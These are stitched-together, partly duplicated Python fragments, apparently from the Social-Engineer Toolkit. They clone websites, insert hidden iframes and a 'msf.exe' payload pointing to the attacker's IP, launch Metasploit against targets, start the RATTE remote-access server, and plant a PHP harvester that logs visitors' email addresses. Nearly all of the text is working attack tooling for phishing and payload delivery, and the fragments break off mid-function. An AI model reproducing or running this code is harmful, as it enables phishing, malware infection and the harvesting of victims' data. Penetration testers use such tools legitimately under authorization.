def launch(): """ here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then if path variables aren't set for msfconsole this will break, even if its specified in set_config """ # launch the attack setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..") # try/catch block try: child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer") child.interact() # handle exceptions and log them except Exception, error: setcore.log(error)
def launch(): """ here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then if path variables aren't set for msfconsole this will break, even if its specified in set_config """ # launch the attack core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..") # try/catch block try: child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'), os.path.join(core.userconfigpath, "autopwn.answer"))) child.interact() # handle exceptions and log them except Exception as error: core.log(error)
def launch(): """ here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then if path variables aren't set for msfconsole this will break, even if its specified in set_config """ # launch the attack setcore.PrintStatus( "Launching Metasploit and attacking the systems specified. This may take a moment.." ) # try/catch block try: child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer") child.interact() # handle exceptions and log them except Exception, error: setcore.log(error)
if stager == "off": # only trigger if we are using the SETSHELL if payload_selection == "SETSHELL": # ensure that index.html is really there if os.path.isfile("src/program_junk/web_clone/index.html"): setcore.PrintStatus("Stager turned off, prepping direct download payload...") fileopen = file("src/program_junk/web_clone/index.html", "r") filewrite = file("src/program_junk/web_clone/index.html.3", "w") data = fileopen.read() # replace freehugs with ip and port data = data.replace("freehugs", reverse_connection) filewrite.write(data) filewrite.close() time.sleep(1) # here we remove old stuff and replace with everything we need to be newer try: os.remove("src/program_junk/web_clone/index.html") shutil.copyfile("src/program_junk/web_clone/index.html.3", "src/program_junk/web_clone/index.html") os.remove("src/program_junk/web_clone/index.html.3") os.remove("src/program_junk/web_clone/msf.exe") shutil.copyfile("src/program_junk/web_clone/x", "src/program_junk/web_clone/msf.exe") os.remove("src/html/msf.exe") shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe") os.remove("src/program_junk/msf.exe") shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe") # catch errors, will convert to log later except Exception, error: setcore.log(error) pass
if os.path.isfile("src/program_junk/web_clone/msf.exe"): os.remove("src/program_junk/web_clone/msf.exe") shutil.copyfile("src/program_junk/web_clone/x", "src/program_junk/web_clone/msf.exe") if os.path.isfile("src/html/msf.exe"): os.remove("src/html/msf.exe") shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): os.remove("src/program_junk/msf.exe") shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe") # catch errors, will convert to log later except Exception, error: setcore.log(error) # if we are using the HTTP reverse shell then lets use this if payload_selection == "SETSHELL_HTTP": try: if os.path.isfile("src/program_junk/web_clone/index.html"): os.remove("src/program_junk/web_clone/index.html") shutil.copyfile("src/program_junk/web_clone/index.html.3", "src/program_junk/web_clone/index.html") if os.path.isfile( "src/program_junk/web_clone/index.html.3"): os.remove("src/program_junk/web_clone/index.html.3") if os.path.isfile("src/program_junk/web_clone/msf.exe"): os.remove("src/program_junk/web_clone/msf.exe") shutil.copyfile( "src/payloads/set_payloads/http_shell.binary",
def web_server_start(): # define if use apache or not apache = False # open set_config here apache_check = core.check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = core.check_config("APACHE_DIRECTORY=") if os.path.isdir(os.path.join(apache_path, "html")): os.path.join(apache_path, "html") apache = True if operating_system == "windows": apache = False # specify the web port web_port = core.check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config")) as fileopen: for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) if match: match2 = re.search("set SRVPORT 8080", line) if not match2: web_port = 8080 # check ip address if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter your ip address: ") # unless we create template do self template = "SELF" # Grab custom or set defined if os.path.isfile(os.path.join(core.setdir, "site.template")): with open(core.setdir, "site.template") as fileopen: for line in fileopen: line = line.rstrip() template_match = re.search("TEMPLATE=", line) url_match = re.search("URL=", line) if url_match: # define url to clone here url = line.split("=")[1].rstrip() if template_match: template = line.split("=")[1] # if attach vector isn't set just set a default template attack_vector = "nada" # grab web attack selection if os.path.isfile(os.path.join(core.setdir, "attack_vector")): with open(os.path.join(core.setdir, "attack_vector")) as fileopen: for line in fileopen: attack_vector = line.rstrip() # Sticking it to A/V below rand_gen = random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(os.path.join(core.setdir, "multi_harvester")): multiattack_harv = "on" if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")): multiattack_harv = "on" # If SET is setting up the website for you, get the website ready for # delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html if attack_vector == "java": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: match1 = re.search("msf.exe", line) if match1: line = line.replace("msf.exe", rand_gen) match = re.search("ipaddrhere", line) if match: line = line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: counter = 0 match = re.search(applet_name, line) if match: line = line.replace(applet_name, "invalid.jar") filewrite.write(line) counter = 1 match2 = re.search("<head>", line) if match2: if web_port != 8080: line = line.replace("<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr)) filewrite.write(line) counter = 1 if web_port == 8080: line = line.replace( "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr)) filewrite.write(line) counter = 1 if counter == 0: filewrite.write(line) if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid' and attack_vector != 'hijacking': print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC) # copy all the files needed if not os.path.isfile(os.path.join(core.setdir, applet_name)): shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name)) shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name)) if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")): nix = core.check_options("NIX.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix)) if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")): mac = core.check_options("MAC.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac)) if os.path.isfile(os.path.join(core.setdir, "msf.exe")): win = core.check_options("MSF.EXE=") shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win)) # pull random name generation core.print_status("The site has been moved. SET Web Server is now listening..") rand_gen = core.check_options("MSF_EXE=") if rand_gen: if os.path.isfile(os.path.join(core.setdir, "custom.exe")): shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe")) print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now") shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(os.path.join(core.setdir, "docbase.file")): docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr)) if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")): os.remove(os.path.join(core.setdir, "web_clone/site.html")) shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html")) with open(core.setdir + "/web_clone/index.html", "w") as filewrite: filewrite.write(docbase) ########################################################################## # # START WEB SERVER STUFF HERE # ########################################################################## if not apache: if multiattack_harv == 'off': try: # specify port listener here # specify the path for the SET web directories for the applet # attack path = os.path.join(core.setdir, "web_clone/") try: import src.core.webserver as webserver p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: thread.start_new_thread(webserver.start_server, (web_port, path)) # Handle KeyboardInterrupt except KeyboardInterrupt: core.exit_set() # Handle Exceptions except Exception as e: core.log(e) print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??" "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC)) stop_apache = input("Attempt to stop Apache? y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack path = os.path.join(core.setdir + "web_clone") p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC)) sys.exit() # if we are custom, put a pause here to not terminate thread on web # server if template == "CUSTOM" or template == "SELF": custom_exe = core.check_options("CUSTOM_EXE=") if custom_exe: while True: # try block inside of loop, if control-c detected, then # exit try: core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!") input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC)) # handle keyboard interrupt except KeyboardInterrupt: print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC)) break if apache: subprocess.Popen("cp {0} {apache_path};" "cp {1} {apache_path};" "cp {2} {apache_path};" "cp {3} {apache_path};" "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"), os.path.join(definepath, "src/html/*.html"), os.path.join(core.setdir, "web_clone/*"), os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "*.jar"), apache_path=apache_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite: filewrite.write("") subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait() # here we specify if we are tracking users and such with open(os.path.join(apache_path, "index.html")) as fileopen: data = fileopen.read() data = data.replace("<body>", "<body>" "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n" "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now)) with open(os.path.join(apache_path, "index.php"), "w") as filewrite: filewrite.write(data) core.print_status("All files have been copied to {}".format(apache_path)) ########################################################################## # # END WEB SERVER STUFF HERE # ########################################################################## if operating_system != "windows": # Grab metaspoit path msf_path = core.meta_path()
# prep ratte if its posix if operating_system == "posix": subprocess.Popen("chmod +x src/payloads/ratte/ratteserver", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) os.system("src/payloads/ratte/ratteserver {0}".format(port)) # if not then run it in windows if operating_system == "windows": if not os.path.isfile(os.path.join(core.setdir, "ratteserver.exe")): shutil.copyfile("../../payloads/ratte/ratteserver.binary", os.path.join(core.setdir, "ratteserver.exe")) shutil.copyfile("../../payloads/ratte/cygwin1.dll", os.path.join(core.setdir, "/cygwin1.dll")) os.system(os.path.join(core.setdir, "ratteserver {0}".format(port))) # handle errors except Exception as e: core.log(e) try: if apache: input(core.bcolors.ENDC + "\nPress [return] when finished.") # child.close() child1.close() # close ettercap thread, need to launch from here eventually instead of executing # an underlying system command. if operating_system == "posix": subprocess.Popen("pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait() # kill dnsspoof if there subprocess.Popen("pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait() if apache: subprocess.Popen("rm {0};" "rm {1};"
def web_server_start(): # define if use apache or not apache = False # open set_config here apache_check = core.check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = core.check_config("APACHE_DIRECTORY=") if os.path.isdir(os.path.join(apache_path, "html")): os.path.join(apache_path, "html") apache = True if operating_system == "windows": apache = False # specify the web port web_port = core.check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config")) as fileopen: for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) if match: match2 = re.search("set SRVPORT 8080", line) if not match2: web_port = 8080 # check ip address if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter your ip address: ") # unless we create template do self template = "SELF" # Grab custom or set defined if os.path.isfile(os.path.join(core.setdir, "site.template")): with open(core.setdir, "site.template") as fileopen: for line in fileopen: line = line.rstrip() template_match = re.search("TEMPLATE=", line) url_match = re.search("URL=", line) if url_match: # define url to clone here url = line.split("=")[1].rstrip() if template_match: template = line.split("=")[1] # if attach vector isn't set just set a default template attack_vector = "nada" # grab web attack selection if os.path.isfile(os.path.join(core.setdir, "attack_vector")): with open(os.path.join(core.setdir, "attack_vector")) as fileopen: for line in fileopen: attack_vector = line.rstrip() # Sticking it to A/V below rand_gen = random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(os.path.join(core.setdir, "multi_harvester")): multiattack_harv = "on" if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")): multiattack_harv = "on" # If SET is setting up the website for you, get the website ready for # delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html if attack_vector == "java": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: match1 = re.search("msf.exe", line) if match1: line = line.replace("msf.exe", rand_gen) match = re.search("ipaddrhere", line) if match: line = line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: counter = 0 match = re.search(applet_name, line) if match: line = line.replace(applet_name, "invalid.jar") filewrite.write(line) counter = 1 match2 = re.search("<head>", line) if match2: if web_port != 8080: line = line.replace( "<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if web_port == 8080: line = line.replace( "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if counter == 0: filewrite.write(line) if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid' and attack_vector != 'hijacking': print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC) # copy all the files needed if not os.path.isfile(os.path.join(core.setdir, applet_name)): shutil.copyfile( os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name)) shutil.copyfile( os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name)) if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")): nix = core.check_options("NIX.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix)) if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")): mac = core.check_options("MAC.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac)) if os.path.isfile(os.path.join(core.setdir, "msf.exe")): win = core.check_options("MSF.EXE=") shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win)) # pull random name generation core.print_status( "The site has been moved. SET Web Server is now listening..") rand_gen = core.check_options("MSF_EXE=") if rand_gen: if os.path.isfile(os.path.join(core.setdir, "custom.exe")): shutil.copyfile( os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe")) print( "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now" ) shutil.copyfile( os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(os.path.join(core.setdir, "docbase.file")): docbase = ( r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr)) if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")): os.remove(os.path.join(core.setdir, "web_clone/site.html")) shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html")) with open(core.setdir + "/web_clone/index.html", "w") as filewrite: filewrite.write(docbase) ########################################################################## # # START WEB SERVER STUFF HERE # ########################################################################## if not apache: if multiattack_harv == 'off': try: # specify port listener here # specify the path for the SET web directories for the applet # attack path = os.path.join(core.setdir, "web_clone/") try: import src.core.webserver as webserver p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: thread.start_new_thread(webserver.start_server, (web_port, path)) # Handle KeyboardInterrupt except KeyboardInterrupt: core.exit_set() # Handle Exceptions except Exception as e: core.log(e) print( "{0}[!] ERROR: You probably have something running on port 80 already, Apache??" "[!] There was an issue, printing error: {1}{2}".format( core.bcolors.RED, e, core.bcolors.ENDC)) stop_apache = input("Attempt to stop Apache? y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack path = os.path.join(core.setdir + "web_clone") p = multiprocessing.Process( target=webserver.start_server, args=(web_port, path)) p.start() except: print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}". format(core.bcolors.RED, core.bcolors.ENDC)) sys.exit() # if we are custom, put a pause here to not terminate thread on web # server if template == "CUSTOM" or template == "SELF": custom_exe = core.check_options("CUSTOM_EXE=") if custom_exe: while True: # try block inside of loop, if control-c detected, then # exit try: core.print_warning( "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!" ) input( "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}" .format(core.bcolors.GREEN, core.bcolors.ENDC)) # handle keyboard interrupt except KeyboardInterrupt: print("{0}[*] Returning to main menu.{1}".format( core.bcolors.GREEN, core.bcolors.ENDC)) break if apache: subprocess.Popen("cp {0} {apache_path};" "cp {1} {apache_path};" "cp {2} {apache_path};" "cp {3} {apache_path};" "cp {4} {apache_path}".format( os.path.join(definepath, "src/html/*.bin"), os.path.join(definepath, "src/html/*.html"), os.path.join(core.setdir, "web_clone/*"), os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "*.jar"), apache_path=apache_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() with open( os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite: filewrite.write("") subprocess.Popen("chown www-data:www-data '{0}'".format( os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait() # here we specify if we are tracking users and such with open(os.path.join(apache_path, "index.html")) as fileopen: data = fileopen.read() data = data.replace( "<body>", "<body>" "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n" "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */" .format(now)) with open(os.path.join(apache_path, "index.php"), "w") as filewrite: filewrite.write(data) core.print_status( "All files have been copied to {}".format(apache_path)) ########################################################################## # # END WEB SERVER STUFF HERE # ########################################################################## if operating_system != "windows": # Grab metaspoit path msf_path = core.meta_path()
# if not then run it in windows if operating_system == "windows": if not os.path.isfile( os.path.join(core.setdir, "ratteserver.exe")): shutil.copyfile( "../../payloads/ratte/ratteserver.binary", os.path.join(core.setdir, "ratteserver.exe")) shutil.copyfile("../../payloads/ratte/cygwin1.dll", os.path.join(core.setdir, "/cygwin1.dll")) os.system( os.path.join(core.setdir, "ratteserver {0}".format(port))) # handle errors except Exception as e: core.log(e) try: if apache: input(core.bcolors.ENDC + "\nPress [return] when finished.") # child.close() child1.close() # close ettercap thread, need to launch from here eventually instead of executing # an underlying system command. if operating_system == "posix": subprocess.Popen("pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait() # kill dnsspoof if there subprocess.Popen("pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait() if apache: